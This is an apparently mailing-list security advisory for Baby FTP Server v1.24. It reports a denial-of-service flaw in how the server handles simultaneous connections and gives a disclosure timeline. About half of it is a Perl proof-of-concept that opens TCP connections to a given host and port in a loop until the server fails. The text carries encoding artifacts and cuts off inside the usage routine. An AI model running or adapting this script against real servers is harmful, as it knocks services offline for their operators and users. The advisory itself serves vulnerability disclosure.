|
[DCA-0004]
[Software]
=A0- Baby FTP Server
[Vendor Product Description]
=A0- Baby FTP server has only the most necessary features and is yet
powerful enough to be a basis for a more complex server
[Bug Description]
=A0- The FTP Server can't handle multiple/simultaneous connections
leading to Denial-of-Service
[History]
=A0- Advisory sent to vendor on 06/14/2010.
=A0- No response from vendor
=A0- Public advisory & exploit 08/02/2010.
[Impact]
=A0- Low
[Affected Version]
=A0- Baby FTP Server v1.24
=A0- Prior versions may also be vulnerable
[Code]
#!/usr/bin/perl
use IO::Socket;
=A0=A0=A0=A0=A0=A0=A0 if (@ARGV < 1) {
=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0 usage();
=A0=A0=A0=A0=A0=A0=A0 }
=A0=A0=A0=A0=A0=A0=A0 $ip=A0=A0=A0=A0 = $ARGV[0];
=A0=A0=A0=A0=A0=A0=A0 $port=A0=A0 = $ARGV[1];
=A0=A0=A0=A0=A0=A0=A0 $conn=A0=A0 = $ARGV[2];
=A0=A0=A0=A0=A0=A0=A0 $num=A0=A0=A0 = 0;
=A0=A0=A0=A0=A0=A0=A0 print "[+] Sending request...\n";
=A0=A0=A0=A0=A0=A0=A0 while ( $num <= $conn ) {
=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0 system("echo -n .");
=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0 $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
=A0=A0=A0=A0=A0=A0=A0 close($s);
=A0=A0=A0=A0=A0=A0=A0 $num++;
=A0=A0=A0=A0=A0=A0=A0 }
=A0=A0=A0=A0=A0=A0=A0 print "\n[+] Done!\n";
sub usage() {
=A0=A0=A0=A0=A0=A0=A0 print "[-] Usage: <". $0 .">